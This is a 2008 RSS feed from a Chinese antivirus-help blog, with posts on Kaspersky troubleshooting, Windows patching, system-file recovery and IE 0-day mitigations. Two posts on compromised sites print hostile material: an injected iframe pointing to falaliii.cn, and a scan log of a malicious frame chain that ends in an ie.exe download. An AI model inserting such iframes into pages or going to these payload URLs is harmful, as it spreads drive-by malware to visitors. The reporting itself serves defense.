<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title><![CDATA[ICKA'S 垃圾桶]]></title> 
<link>http://www.icka.com.cn/blog/index.php</link> 
<description><![CDATA[反病毒 补丁 下载 破解 病毒救援 免费 病毒网 电脑应用 手动清理病毒]]></description> 
<language>zh-cn</language> 
<copyright><![CDATA[ICKA'S 垃圾桶]]></copyright>
<item>
<link>http://www.icka.com.cn/blog/read.php?197</link>
<title><![CDATA[Bo-Blog V2.1.1 正式版发布【转】]]></title> 
<author>icka &lt;icka#163.com&gt;</author>
<category><![CDATA[常用下载]]></category>
<pubDate>Fri, 26 Dec 2008 12:43:42 +0000</pubDate> 
<guid>http://www.icka.com.cn/blog/read.php?197</guid> 
<description>
<![CDATA[ 
	祝大家新年快乐！<br/><br/>2.1.1是2.1.0之后的又一个升级版本，包含诸多特性。建议所有旧版用户升级。<br/><br/>2.1.1的更新之处有：<br/>*后台操作全方位启用Ajax，大大提高工作效率。<br/>*程序功能一键式屏蔽。<br/>*OpenID 有限登入支持。<br/>*指定自定义404页面。<br/>其他许多细小更新之处和bug修正，请查阅安装包内的changelog文档。<br/><br/>升级方法(从2.1.0正式版以前的任何版本)：<br/>1 请务必先正确升级到 2.1.0 正式版。<br/>2 按照 2.1.0 正式版到2.1.1的升级方法升级。<br/><br/>升级方法(从2.1.0正式版)：<br/>1 下载文末的2.1.0专用升级包，直接覆盖所有文件。本次升级不需要改动数据库。<br/>务必检查上传的文件是否完整，如有文件为 0 字节则多半是上传不正常，会导致我们无法解答的奇特问题。<br/>2 为确保正常使用，建议清空浏览器缓存。<br/><br/>升级方法(从2.1.1的其它测试版)：<br/>1 也请使用文末的2.1.0专用升级包，直接覆盖所有文件。<br/>务必检查上传的文件是否完整，如有文件为 0 字节则多半是上传不正常，会导致我们无法解答的奇特问题。<br/>2 为确保正常使用，建议清空浏览器缓存。<br/><br/><br/>下载 2.1.1正式版 完整安装包：<br/>【<a href="http://www.bo-blog.com/download/release/Bo-blogV2.1.1.tar.gz" target="_blank">下载</a>】<br/>下载适用于2.1.0正式版的升级包：（2.1.1测试版升级也可用此升级包）<br/>【<a href="http://www.bo-blog.com/download/release/2.1.0-to-2.1.1.zip" target="_blank">下载</a>】<br/><br/><br/>讨论2.1.1：<br/>请到我们的论坛讨论这个版本。<br/>发帖时，务必注明您正在使用的版本！<br/>转自：http://www.bo-blog.com/weblog/boblog-211-release/<br/><br/>Tags - <a href="http://www.icka.com.cn/blog/tag.php?tag=%25E4%25B8%258B%25E8%25BD%25BD" rel="tag">下载</a>
]]>
</description>
</item><item>
<link>http://www.icka.com.cn/blog/read.php?196</link>
<title><![CDATA[针对卡巴斯基企业版客户端病毒库反复更新总为旧病毒库的解决方法]]></title> 
<author>icka &lt;icka#163.com&gt;</author>
<category><![CDATA[电脑应用]]></category>
<pubDate>Thu, 25 Dec 2008 08:54:54 +0000</pubDate> 
<guid>http://www.icka.com.cn/blog/read.php?196</guid> 
<description>
<![CDATA[ 
	出现此问题可能有两种情况<br/>第一：病毒库更新失败，卡巴斯基企业版有两个更新源，分别是卡巴斯基管理服务器和卡巴斯基官方病毒更新服务器，既然无法更新病毒库，则一般是设置错误或者无法连接到上面两个更新源。在更新窗口会提示“物理连接错误”或者“DNS解析错误”，物理连接错误，需要覆盖安装下网络代理，DNS解析错误是说明本机无法连接到外网。<br/>第二：病毒库更新成功，但病毒库依旧是老的病毒库，则一般是从卡巴斯基管理服务器更新的病毒库，但是卡巴斯基管理服务器上的病毒库一直没有更新。需要检查管理服务器，可能情况包括<br/>1：更新路径选择的本地离线病毒库，是固定日期的，这样全局更新任务无论怎么执行病毒库会始终为此离线病毒库。<br/>2：无法连接到卡巴斯基官方病毒库更新服务器，这样管理服务器中的病毒库无法得到更新。<br/>3：病毒库更新任务出错导致更新任务无法执行。<br/>Tags - <a href="http://www.icka.com.cn/blog/tag.php?tag=%25E5%258E%259F%25E5%2588%259B" rel="tag">原创</a> , <a href="http://www.icka.com.cn/blog/tag.php?tag=%25E5%258D%25A1%25E5%25B7%25B4%25E6%2596%25AF%25E5%259F%25BA" rel="tag">卡巴斯基</a>
]]>
</description>
</item><item>
<link>http://www.icka.com.cn/blog/read.php?195</link>
<title><![CDATA[猫扑(mop)新闻社区被挂病毒]]></title> 
<author>icka &lt;icka#163.com&gt;</author>
<category><![CDATA[病毒网页统计]]></category>
<pubDate>Thu, 25 Dec 2008 03:59:33 +0000</pubDate> 
<guid>http://www.icka.com.cn/blog/read.php?195</guid> 
<description>
<![CDATA[ 
	http://bbs.news.mop.com/<br/>被挂病毒，首页增加代码<br/><div class="code"><br/>&lt;iframe src=http://www.falaliii.cn/llsg/14.htm width=50 height=0 border=0&gt;&lt;/iframe&gt; <br/></div><br/>可以见<br/>http://bbs.kafan.cn/thread-392365-1-1.html<br/><br/>Tags - <a href="http://www.icka.com.cn/blog/tag.php?tag=%25E7%2597%2585%25E6%25AF%2592%25E7%25BD%2591%25E9%25A1%25B5" rel="tag">病毒网页</a>
]]>
</description>
</item><item>
<link>http://www.icka.com.cn/blog/read.php?193</link>
<title><![CDATA[卡巴斯基企业版管理工具全局任务病毒库更新任务出错的解决方法]]></title> 
<author>icka &lt;icka#163.com&gt;</author>
<category><![CDATA[电脑应用]]></category>
<pubDate>Tue, 23 Dec 2008 00:41:21 +0000</pubDate> 
<guid>http://www.icka.com.cn/blog/read.php?193</guid> 
<description>
<![CDATA[ 
	卡巴斯基开放空间中的卡巴斯基管理工具的病毒库更新任务有的时候运行出错~<br/>第一种方法：<br/><br/>可以右键管理工具全局任务的此更新任务，选择“删除”，然后关闭卡巴斯基管理工具。<br/><a href="http://www.icka.com.cn/blog/attachment.php?fid=68" target="_blank"><img src="http://www.icka.com.cn/blog/attachment.php?fid=68" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/><br/><br/>点击“开始”---“运行”输入<br/><div class="code"><br/>msiexec /f &#123;12C259B1-8E8C-498D-927D-60040190BF79&#125;<br/></div><br/>回车<br/><a href="http://www.icka.com.cn/blog/attachment.php?fid=69" target="_blank"><img src="http://www.icka.com.cn/blog/attachment.php?fid=69" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/><br/>卡巴斯基管理工具开始修复<br/><br/><a href="http://www.icka.com.cn/blog/attachment.php?fid=72" target="_blank"><img src="http://www.icka.com.cn/blog/attachment.php?fid=72" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/>等进行完成后，点击“开始”--“运行”输入<br/><div class="code"><br/>services.msc<br/></div><br/>启动“卡巴斯基管理服务器”、“卡巴斯基网络代理”两个服务。<br/><br/><a href="http://www.icka.com.cn/blog/attachment.php?fid=70" target="_blank"><img src="http://www.icka.com.cn/blog/attachment.php?fid=70" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/><br/><a href="http://www.icka.com.cn/blog/attachment.php?fid=71" target="_blank"><img src="http://www.icka.com.cn/blog/attachment.php?fid=71" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/>启动卡巴斯基管理工具<br/>在全局任务里重新建立管理工具病毒库更新任务即可。<br/><br/><a href="http://www.icka.com.cn/blog/attachment.php?fid=63" target="_blank"><img src="http://www.icka.com.cn/blog/attachment.php?fid=63" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/><a href="http://www.icka.com.cn/blog/attachment.php?fid=64" target="_blank"><img src="http://www.icka.com.cn/blog/attachment.php?fid=64" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/><a href="http://www.icka.com.cn/blog/attachment.php?fid=65" target="_blank"><img src="http://www.icka.com.cn/blog/attachment.php?fid=65" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/><a href="http://www.icka.com.cn/blog/attachment.php?fid=66" target="_blank"><img src="http://www.icka.com.cn/blog/attachment.php?fid=66" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/><a href="http://www.icka.com.cn/blog/attachment.php?fid=67" target="_blank"><img src="http://www.icka.com.cn/blog/attachment.php?fid=67" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/><a href="http://www.icka.com.cn/blog/attachment.php?fid=73" target="_blank"><img src="http://www.icka.com.cn/blog/attachment.php?fid=73" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/><br/><br/>第2种方法：<br/>下载<a href="http://icka.com.cn/kabadown/index.php?dirpath=./修复工具&order=0" target="_blank">http://icka.com.cn/kabadown/index.php?dirpath=./修复工具&order=0</a>中的kldupfix.rar修复。<br/><br/><br/>Tags - <a href="http://www.icka.com.cn/blog/tag.php?tag=%25E5%258E%259F%25E5%2588%259B" rel="tag">原创</a> , <a href="http://www.icka.com.cn/blog/tag.php?tag=%25E5%258D%25A1%25E5%25B7%25B4%25E6%2596%25AF%25E5%259F%25BA" rel="tag">卡巴斯基</a>
]]>
</description>
</item><item>
<link>http://www.icka.com.cn/blog/read.php?192</link>
<title><![CDATA[常用的给系统打补丁的方法]]></title> 
<author>icka &lt;icka#163.com&gt;</author>
<category><![CDATA[电脑安全]]></category>
<pubDate>Fri, 19 Dec 2008 06:57:27 +0000</pubDate> 
<guid>http://www.icka.com.cn/blog/read.php?192</guid> 
<description>
<![CDATA[ 
	要想让电脑本身没有啥漏洞，就需要时常打下安全补丁~<br/><br/>补丁包括系统本身的安全补丁及其系统所安装的第三方应用软件的补丁。<br/><br/><br/>打系统补丁可以选择<br/><br/>一：打开自动更新，右键我的电脑选择属性，选择 “自动更新”根据自己的情况选择以什么方式来更新及其安装（建议选择自定义那个），针对WINXP SP2记得有几个补丁可以根据自己的选择不进行安装，1）WGA补丁，也就是验证你系统是否是盗版的受害者，现在盗版的系统还是比较多的，打了可能会黑屏的2）IE7.0如果你比较习惯使用IE6，那就不用下载这个补丁了，当然整体7还是6好点的3）WIN XP SP3补丁，这个补丁几百兆，要是你不想升级到SP3，那么这个也是可以不下载安装。微软在线更新地址为<br/><a href="http://windowsupdate.microsoft.com/" target="_blank">http://windowsupdate.microsoft.com/</a><br/><br/>二，使用第3方工具(部分工具支持检测第3方软件的漏洞)<br/><br/>1：360安全卫士&nbsp;&nbsp;<a href="http://www.360.cn" target="_blank">http://www.360.cn</a><br/><br/>2：金山清理专家 <a href="http://www.duba.net/zt/ksc/ksc2/" target="_blank">http://www.duba.net/zt/ksc/ksc2/</a><br/><br/>3：超级兔子升级天使&nbsp;&nbsp;<a href="http://www.pctutu.com/srupdate/" target="_blank">http://www.pctutu.com/srupdate/</a><br/><br/>4: <br/><br/>三，使用第三方补丁包<br/><br/>网上会有定期的完整补丁包提供下载<br/><br/>例如<a href="http://soft.ylmf.com/downlist/47.html" target="_blank">http://soft.ylmf.com/downlist/47.html</a>可以自行进行搜索。<br/>Tags - <a href="http://www.icka.com.cn/blog/tag.php?tag=%25E8%25A1%25A5%25E4%25B8%2581" rel="tag">补丁</a> , <a href="http://www.icka.com.cn/blog/tag.php?tag=%25E5%258E%259F%25E5%2588%259B" rel="tag">原创</a>
]]>
</description>
</item><item>
<link>http://www.icka.com.cn/blog/read.php?191</link>
<title><![CDATA[针对系统userinit.exe被删除的解决方法]]></title> 
<author>icka &lt;icka#163.com&gt;</author>
<category><![CDATA[电脑应用]]></category>
<pubDate>Thu, 18 Dec 2008 07:36:18 +0000</pubDate> 
<guid>http://www.icka.com.cn/blog/read.php?191</guid> 
<description>
<![CDATA[ 
	近期有HB木马群会感染系统的userinit.exe和rpcss.dll文件~杀毒软件可能会强行删除掉。<br/>删除掉userinit.exe会导致机器使用停留在登陆界面无法进入到桌面<br/>删除掉rpcss.dll会导致机器任务栏的内容不显示、系统复制粘贴功能失效。<br/><br/>rpcss.dll丢失可以从<a href="http://www.icka.com.cn/safe/" target="_blank">http://www.icka.com.cn/safe/</a> 中的zhengchangwenjian中下载对应版本到system32路径下即可，如果从其他地方拷贝到电脑上的，因为没有复制粘贴功能了，所以只能选择MS-DOS命令copy拷贝文件到系统目录里<br/><br/>userinit.exe被删除，系统会启动不起来，我们可以使用两种方法恢复：<br/><br/>第一种方法可以使用winpe光盘引导系统，然后将对应的系统文件拷贝到system32目录下即可。<br/>第二种方法可以使用<span style="color: #FF0000;">对应版本</span>的完整安装盘来恢复（不能使用GHOST盘恢复，因为上面没有需要的系统的单个文件）<br/><br/>以WINXP为例：<br/><br/>1：本例系统为WINDOWS XP SP2，所以需要将WINDOWS XP SP2光盘放入光驱，设置开机从光盘引导系统：<br/><a href="http://www.icka.com.cn/blog/attachment.php?fid=59" target="_blank"><img src="http://www.icka.com.cn/blog/attachment.php?fid=59" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/>2：按"R"进入恢复控制台。<br/>3：根据自己的系统情况选择，本例只有一个WINXP系统并且安装在C盘下，这里按“1”，然后输入管理员密码，回车。<br/><a href="http://www.icka.com.cn/blog/attachment.php?fid=60" target="_blank"><img src="http://www.icka.com.cn/blog/attachment.php?fid=60" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/>4：确认下光盘所分配的盘符号，本例为E。<br/><a href="http://www.icka.com.cn/blog/attachment.php?fid=61" target="_blank"><img src="http://www.icka.com.cn/blog/attachment.php?fid=61" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/>5：从光盘提取文件到本地系统中。<br/>使用命令<br/><div class="code"><br/>expand X:&#92;i386&#92;userinit.ex_ c:&#92;windows&#92;system32&#92;&nbsp;&nbsp;<br/></div><br/><strong><span style="color: #FF0000;">注：X为光盘实际盘符&nbsp;&nbsp;ex_后面有一个空格</span></strong><br/><a href="http://www.icka.com.cn/blog/attachment.php?fid=62" target="_blank"><img src="http://www.icka.com.cn/blog/attachment.php?fid=62" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/>本例中先提前将userinit.exe删除掉，然后使用命令提取文件，最后用DIR命令查看也确实提取成功了。<br/>完毕！<br/><br/><br/><br/><br/><br/><br/>Tags - <a href="http://www.icka.com.cn/blog/tag.php?tag=%25E5%258E%259F%25E5%2588%259B" rel="tag">原创</a> , <a href="http://www.icka.com.cn/blog/tag.php?tag=%25E7%25B3%25BB%25E7%25BB%259F" rel="tag">系统</a> , <a href="http://www.icka.com.cn/blog/tag.php?tag=%25E5%25BE%25AE%25E8%25BD%25AF" rel="tag">微软</a>
]]>
</description>
</item><item>
<link>http://www.icka.com.cn/blog/read.php?190</link>
<title><![CDATA[微软发布针对IE的0Day漏洞非常规补丁(MS08-078)]]></title> 
<author>icka &lt;icka#163.com&gt;</author>
<category><![CDATA[电脑安全]]></category>
<pubDate>Thu, 18 Dec 2008 01:35:35 +0000</pubDate> 
<guid>http://www.icka.com.cn/blog/read.php?190</guid> 
<description>
<![CDATA[ 
	官方下载连接<br/><a href="http://www.microsoft.com/technet/security/bulletin/ms08-078.mspx" target="_blank">http://www.microsoft.com/technet/security/bulletin/ms08-078.mspx</a><br/>大家按照对应的系统及其IE版本下载对应的补丁即可。<br/>IE6（XP SP2 and SP3）：<br/>　<a href="http://download.microsoft.com/download/6/B/F/6BFE902B-39A0-422E-B4F7-90147AD0921E/WindowsXP-KB960714-x86-CHS.exe" target="_blank">http://download.microsoft.com/download/6/B/F/6BFE902B-39A0-422E-B4F7-90147AD0921E/WindowsXP-KB960714-x86-CHS.exe</a><br/><br/>　　IE7（XP SP2 and SP3）：<br/>　　<a href="http://download.microsoft.com/download/F/1/C/F1C06266-86BE-407A-A693-223A89500E8D/IE7-WindowsXP-KB960714-x86-CHS.exe" target="_blank">http://download.microsoft.com/download/F/1/C/F1C06266-86BE-407A-A693-223A89500E8D/IE7-WindowsXP-KB960714-x86-CHS.exe</a><br/><br/>　　Vista ：<br/>　　<a href="http://download.microsoft.com/download/4/1/D/41D1E00B-D222-4025-B798-58A2D15F054D/Windows6.0-KB960714-x86.msu" target="_blank">http://download.microsoft.com/download/4/1/D/41D1E00B-D222-4025-B798-58A2D15F054D/Windows6.0-KB960714-x86.msu</a><br/>Tags - <a href="http://www.icka.com.cn/blog/tag.php?tag=%25E8%25A1%25A5%25E4%25B8%2581" rel="tag">补丁</a> , <a href="http://www.icka.com.cn/blog/tag.php?tag=%25E5%25BE%25AE%25E8%25BD%25AF" rel="tag">微软</a>
]]>
</description>
</item><item>
<link>http://www.icka.com.cn/blog/read.php?189</link>
<title><![CDATA[Microsoft 安全通报：4 种方法暂时屏蔽 IE 最新 0day[转]]]></title> 
<author>icka &lt;icka#163.com&gt;</author>
<category><![CDATA[电脑安全]]></category>
<pubDate>Sun, 14 Dec 2008 01:19:23 +0000</pubDate> 
<guid>http://www.icka.com.cn/blog/read.php?189</guid> 
<description>
<![CDATA[ 
	 <br/>IE 最新 0day 波及了微软全线系统，目前暂时没有补丁。微软于近日发布了一份安全通报，指导您如何暂时屏蔽此漏洞。<br/>漏洞出在 OLEDB32.dll 这个文件上。所以我们的目的就是屏蔽这个文件。对此，微软连出了4个杀手锏：<br/>1. SACL 法<br/>2. 禁用 Row Position 功能法<br/>3. 取消 DLL 注册法<br/>4. 权限设置法<br/>详情请见：<br/><br/><div class="code"><br/>1. SACL 法<br/>&#91;Unicode&#93;<br/>Unicode=yes<br/>&#91;Version&#93;<br/>signature=&quot;$CHICAGO$&quot;<br/>Revision=1<br/>&#91;File Security&#93;<br/>&quot;%ProgramFiles%&#92;Common Files&#92;System&#92;Ole DB&#92;oledb32.dll&quot;,2,&quot;S:(ML;;NWNRNX;;;ME)&quot;<br/><br/>将以上内容保存为 BlockAccess_x86.inf<br/>然后在命令提示符里执行 SecEdit/configure/db BlockAccess.sdb/cfg &lt;inf file&gt;<br/>其中 &lt;inf file&gt; 为 inf 文件路径。若成功会看到“操作成功完成”的提示。<br/><br/>2. 禁用 Row Position 功能法<br/><br/><br/>HKEY_CLASSES_ROOT&#92;CLSID&#92;&#123;2048EEE6-7FA2-11D0-9E6A-00A0C9138C29&#125; <br/>打开注册表编辑器，将此键删除即可。<br/><br/>3. 取消 DLL 注册法<br/><br/>在命令提示符中输入 Regsvr32.exe/u &quot;Program Files&#92;Common Files&#92;System&#92;Ole DB&#92;oledb32.dll&quot;<br/>即可<br/><br/>4. 权限设置法<br/><br/>在命令提示符中输入 cacls &quot;Program Files&#92;Common Files&#92;System&#92;Ole DB&#92;oledb32.dll&quot;/E/P everyone:N <br/><br/>Vista 系统则需要输入3个命令：<br/><br/>takeown/f &quot;Program Files&#92;Common Files&#92;System&#92;Ole DB&#92;oledb32.dll&quot;<br/>icacls &quot;Program Files&#92;Common Files&#92;System&#92;Ole DB&#92;oledb32.dll&quot;/save %TEMP%&#92;oledb32.32.dll.TXT<br/>icacls &quot;Program Files&#92;Common Files&#92;System&#92;Ole DB&#92;oledb32.dll&quot;/deny everyone:(F) <br/><br/>其中第一种方法影响最小（只影响 IE 对此 DLL 的访问）。<br/></div><br/><br/>附：此漏洞影响的系统、软件列表<br/><br/>Windows Internet Explorer 7 <br/>Windows Internet Explorer 7 for Windows XP <br/>Windows Internet Explorer 7 for Windows Server 2003 <br/>Windows Internet Explorer 7 for Windows Server 2003 IA64 <br/>Windows Internet Explorer 7 in Windows Vista <br/>Windows Internet Explorer 8 Beta <br/>Microsoft Internet Explorer 6.0 Service Pack 2 <br/>Microsoft Internet Explorer 6.0 Service Pack 1 <br/>Microsoft Internet Explorer 6.0 <br/>Microsoft Internet Explorer 5.01 Service Pack 4 <br/>Windows Server 2008 Datacenter without Hyper-V <br/>Windows Server 2008 Enterprise without Hyper-V <br/>Windows Server 2008 for Itanium-Based Systems <br/>Windows Server 2008 Standard without Hyper-V <br/>Windows Server 2008 Datacenter <br/>Windows Server 2008 Enterprise <br/>Windows Server 2008 Standard <br/>Windows Web Server 2008 <br/>Windows Vista Service Pack 1, when used with: <br/>Windows Vista Business <br/>Windows Vista Enterprise <br/>Windows Vista Home Basic <br/>Windows Vista Home Premium <br/>Windows Vista Starter <br/>Windows Vista Ultimate <br/>Windows Vista Enterprise 64-bit Edition <br/>Windows Vista Home Basic 64-bit Edition <br/>Windows Vista Home Premium 64-bit Edition <br/>Windows Vista Ultimate 64-bit Edition <br/>Windows Vista Business 64-bit Edition <br/>Microsoft Windows Server 2003 Service Pack 1, when used with: <br/>Microsoft Windows Server 2003, Standard Edition (32-bit x86) <br/>Microsoft Windows Server 2003, Enterprise Edition (32-bit x86) <br/>Microsoft Windows Server 2003, Datacenter Edition (32-bit x86) <br/>Microsoft Windows Server 2003, Web Edition <br/>Microsoft Windows Server 2003, Datacenter Edition for Itanium-Based Systems <br/>Microsoft Windows Server 2003, Enterprise Edition for Itanium-based Systems <br/>Microsoft Windows Server 2003, Datacenter x64 Edition <br/>Microsoft Windows Server 2003, Enterprise x64 Edition <br/>Microsoft Windows Server 2003, Standard x64 Edition <br/>Microsoft Windows XP Professional x64 Edition <br/>Microsoft Windows Server 2003 Service Pack 2, when used with: <br/>Microsoft Windows Server 2003, Standard Edition (32-bit x86) <br/>Microsoft Windows Server 2003, Enterprise Edition (32-bit x86) <br/>Microsoft Windows Server 2003, Datacenter Edition (32-bit x86) <br/>Microsoft Windows Server 2003, Web Edition <br/>Microsoft Windows Server 2003, Datacenter x64 Edition <br/>Microsoft Windows Server 2003, Enterprise x64 Edition <br/>Microsoft Windows Server 2003, Standard x64 Edition <br/>Microsoft Windows XP Professional x64 Edition <br/>Microsoft Windows Server 2003, Datacenter Edition for Itanium-Based Systems <br/>Microsoft Windows Server 2003, Enterprise Edition for Itanium-based Systems <br/>Microsoft Windows XP Service Pack 2, when used with: <br/>Microsoft Windows XP Home Edition <br/>Microsoft Windows XP Professional <br/>Microsoft Windows XP Service Pack 3, when used with: <br/>Microsoft Windows XP Home Edition <br/>Microsoft Windows XP Professional <br/>对于非 x86 系统请参考微软安全通报自行操作<br/>FlowerCode@cnBeta 概括自<a href="http://support.microsoft.com/kb/961051/en-us/" target="_blank">微软安全通报</a><br/><br/>Tags - <a href="http://www.icka.com.cn/blog/tag.php?tag=%25E5%25BE%25AE%25E8%25BD%25AF" rel="tag">微软</a> , <a href="http://www.icka.com.cn/blog/tag.php?tag=0-day" rel="tag">0-day</a>
]]>
</description>
</item><item>
<link>http://www.icka.com.cn/blog/read.php?188</link>
<title><![CDATA[2008.12.13DR.WEB中国区代理 道特韦伯（北京）网站被挂病毒]]></title> 
<author>icka &lt;icka#163.com&gt;</author>
<category><![CDATA[病毒网页统计]]></category>
<pubDate>Sat, 13 Dec 2008 06:44:41 +0000</pubDate> 
<guid>http://www.icka.com.cn/blog/read.php?188</guid> 
<description>
<![CDATA[ 
	<br/><a href="http://www.icka.com.cn/blog/attachment.php?fid=58" target="_blank"><img src="http://www.icka.com.cn/blog/attachment.php?fid=58" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/><br/><div class="code"><br/>Log is generated by FreShow.<br/>&#91;wide&#93;http://www.drweb.com.cn<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#91;script&#93;http://www.drweb.com.cn/Scripts/AC_RunActiveContent.js<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#91;frame&#93;http://g.dsfgr.cn/ko.htm<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;frame&#93;http://g.dsfgr.cn/Flash.htm<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;frame&#93;http://g.dsfgr.cn/ihhh.html<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;frame&#93;http://g.dsfgr.cn/fhhh.html<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;frame&#93;http://g.dsfgr.cn/Access.htm<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;color=red&#93;&#91;object&#93;http://ad.ote2008.info/ad.css&#91;/color&#93;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;frame&#93;http://g.dsfgr.cn/ie.htm&nbsp;&nbsp;--&gt;http://jbl.trcwoman.info/ie.exe<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;frame&#93;http://g.dsfgr.cn/Ms06014.htm<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;frame&#93;http://g.dsfgr.cn/Lz.htm<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;frame&#93;http://g.dsfgr.cn/Bfyy.htm<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;frame&#93;http://g.dsfgr.cn/Access.htm<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;frame&#93;http://g.dsfgr.cn/Cx.htm<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;frame&#93;http://g.dsfgr.cn/XunLei.htm<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;frame&#93;http://g.dsfgr.cn/sina.htm<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;frame&#93;http://g.dsfgr.cn/Real.htm<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;frame&#93;http://g.dsfgr.cn/Real11.htm<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#91;script&#93;http://js.tongji.cn.yahoo.com/872312/ystat.js<br/></div><br/>Tags - <a href="http://www.icka.com.cn/blog/tag.php?tag=%25E7%2597%2585%25E6%25AF%2592%25E7%25BD%2591%25E9%25A1%25B5" rel="tag">病毒网页</a>
]]>
</description>
</item><item>
<link>http://www.icka.com.cn/blog/read.php?187</link>
<title><![CDATA[转：注意IE7的0-DAY漏洞，官方暂无补丁，附补救措施]]></title> 
<author>icka &lt;icka#163.com&gt;</author>
<category><![CDATA[电脑安全]]></category>
<pubDate>Fri, 12 Dec 2008 01:19:40 +0000</pubDate> 
<guid>http://www.icka.com.cn/blog/read.php?187</guid> 
<description>
<![CDATA[ 
	IE7的XML里存在可以导致内存越界的漏洞，通过编写畸形XML代码并且使用JavaScript脚本操作SHELLCODE去执行任意代码。<br/><br/>在2008年下半年开始有流传IE7的漏洞，并于10月份左右开始流出私人买卖，于11月份流入黑市买卖，开始有人面谈出售。<br/><br/>最终出现在网络的具体时间为12月份，大量二手三手漏洞在黑产运作层流通，并且于12月份初开始有大量的人购买二手代码去开发生成器，在9号开始出现在挂马利用上。<br/><br/><br/>系统：<br/><br/>WINDOWS XP<br/><br/>WINDOWS 2003<br/><br/>浏览器：<br/><br/>IE7<br/><br/>描述：<br/><br/>由于SDHTML里处理对象存在在错误导致内存紊乱。<br/>构造某种条件可以使得SDHTML检测到错误释放已被分配的对象，但是释放已被分配的对象后SDHTML并未返回而是继续使用被释放的对象的内存执行，如果这些内存又被分配给其他用途，将导致SDHTML把这些内存当作一个对象来操作。0DAY挂马里使用了XML的SRC字符串对象占用了这些释放对象的空间，而对象指针里包含函数例程指针，最终导致代码执行 。<br/><br/>由于该漏洞尚未被修补，具体细节请等待微软官方发布补丁的详细参考。<br/><br/>防御：<br/><br/>1.请关注微软官方网站及时下载补丁。<br/><br/>2. 开启DEP保护：<br/><br/>系统属性——高级——性能——数据执行保护<br/><br/>可以防止恶意攻击。<br/><br/>3.将wwwwyyyyy.cn以及sllwrnm5.cn加入HOSTS进行屏蔽。<br/><br/>复制一下代码进入HOSTS即可：<br/><br/>127.0.0.1&nbsp;&nbsp; wwwwyyyyy.cn<br/><br/>127.0.0.1&nbsp;&nbsp; sllwrnm5.cn<br/><br/><br/><br/>127.0.0.1&nbsp;&nbsp; sllwrnm5.cn<br/>以上内容转自&nbsp;&nbsp;剑盟<br/><br/><del>12.11日江民推出的补丁有BUF不推荐使用了。</del><br/><br/><strong><span style="color: #FF0000;">目前推荐使用的补丁包括：</span></strong><br/>360的IE7 XML 0day补丁（需安装360） ——不安装补丁仅装360，会拦截病毒下载过程。安装补丁后直接拦截这个0day溢出，内存不会彪涨<br/>金山清理专家网页防挂马 ——拦截病毒下载和运行过程，溢出不拦截<br/>瑞星09&nbsp;&nbsp; <br/>（pluto1313测试）<br/>微软官方推出的屏蔽方法见<br/><a href="http://www.icka.com.cn/blog/read.php?189" target="_blank">http://www.icka.com.cn/blog/read.php?189</a><br/><br/><br/><br/>Tags - <a href="http://www.icka.com.cn/blog/tag.php?tag=%25E5%25AE%2589%25E5%2585%25A8" rel="tag">安全</a> , <a href="http://www.icka.com.cn/blog/tag.php?tag=%25E6%25BC%258F%25E6%25B4%259E" rel="tag">漏洞</a>
]]>
</description>
</item>
</channel>
</rss>